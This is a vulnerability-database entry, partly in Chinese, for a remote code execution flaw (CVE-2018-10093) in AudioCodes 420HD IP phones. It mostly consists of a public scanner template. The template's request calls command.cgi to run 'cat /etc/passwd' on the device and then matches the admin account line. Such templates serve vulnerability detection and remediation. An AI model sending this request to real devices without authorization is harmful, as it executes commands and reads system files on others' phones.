CVE-2018-10093: AudioCodes 420HD - Remote Code Execution

日期: 2025-08-01 | 影响软件: AudioCodes 420HD | POC: 已公开

漏洞描述

AudioCodes IP phone 420HD devices using firmware version 2.2.12.126 allow remote code execution.

PoC代码[已公开]

id: CVE-2018-10093

info:
  name: AudioCodes 420HD - Remote Code Execution
  author: wisnupramoedya
  severity: high
  description: |
    AudioCodes IP phone 420HD devices using firmware version 2.2.12.126 allow remote code execution.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the device, potentially leading to a complete compromise of the phone and unauthorized access to the VoIP network.
  remediation: |
    Apply the latest firmware update provided by AudioCodes to fix the vulnerability and ensure proper input validation.
  reference:
    - https://www.exploit-db.com/exploits/46164
    - https://nvd.nist.gov/vuln/detail/CVE-2018-10093
    - https://www.exploit-db.com/exploits/46164/
    - http://seclists.org/fulldisclosure/2019/Jan/38
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2018-10093
    cwe-id: CWE-862
    epss-score: 0.67728
    epss-percentile: 0.98537
    cpe: cpe:2.3:o:audiocodes:420hd_ip_phone_firmware:2.2.12.126:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: audiocodes
    product: 420hd_ip_phone_firmware
  tags: cve,cve2018,rce,iot,audiocode,edb,seclists,audiocodes

http:
  - method: GET
    path:
      - "{{BaseURL}}/command.cgi?cat%20/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "admin:.*:*sh$"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022007a6c2375775b75ba64661560814303b7e6929aacfc0535d9f449fcda82af349022100965f5b6351ea2f7488647d9e065c02265f6ea6c04b8bc6073146fb5781c942eb:922c64590222798bb761d5b6d8e72950

相关漏洞推荐